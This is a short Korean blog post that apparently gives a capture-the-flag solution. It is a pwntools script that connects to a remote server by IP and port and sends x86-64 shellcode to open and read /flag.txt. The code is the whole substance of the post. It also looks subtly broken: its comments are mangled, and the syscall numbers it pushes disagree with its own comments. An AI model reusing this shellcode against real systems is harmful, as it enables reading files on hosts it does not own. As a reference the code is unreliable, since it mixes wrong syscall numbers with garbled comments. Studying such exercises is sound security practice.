쉘코드를 만들어볼까요?!

호그와트

쉘코드를 만들어볼까요?!

영웅*^%&$ 2023. 1. 10. 13:27

728x90

from pwn import *

#context.binary = elf = ELF("./chall")

p = remote("138.68.176.115", 32076)

#p.recvuntil(b'Input your code here:')

shellcode = asm(
    """
    /* push b'/flag.txt\x00' /
    push 0x74
    lea rax, [rip + offset filename]
    push rax
    / call open('rsp', 'O_RDONLY', 'rdx') /
    push 5 / 2 /
    pop rax
    movq rdi, rsp
    xor esi, esi / O_RDONLY /
    syscall
    / call sendfile(1, 'rax', 0, 0x7fffffff) /
    mov r10d, 0x7fffffff
    mov rsi, rax
    push 187 / 0x28 /
    pop rax
    push 1
    pop rdi
    cdq / rdx=0 */
    syscall
    filename:
    db '/flag.txt', 0
    """
)
p.sendline(shellcode)

p.interactive()

728x90

저작자표시

'호그와트' 카테고리의 다른 글

아름다워~ (0)	2023.01.11
괄호를 잘 닫으셨나요 ? (0)	2023.01.10
퀵 정렬 ! (0)	2023.01.08
머지 머지 정렬! (0)	2023.01.07
웹 fuzzer 응애 (0)	2023.01.05

현재글쉘코드를 만들어볼까요?!

논리적인 사색가의 글쓰기여행

AI researcher & the hacker who love meditation and intellectual catharsis ++ GOD level in Tryhackme

흠냐 #감사합니다, 흠냐, panda, GENIUS, 큐큐, COOKIE, 뉴진스, 호그와트, You, Thanks, Happy, the, thank, 갱얼쥐, 쿠키, 감사합니다, rich, 판다, wisdom, bitcoin,

Today :
Yesterday :

티스토리툴바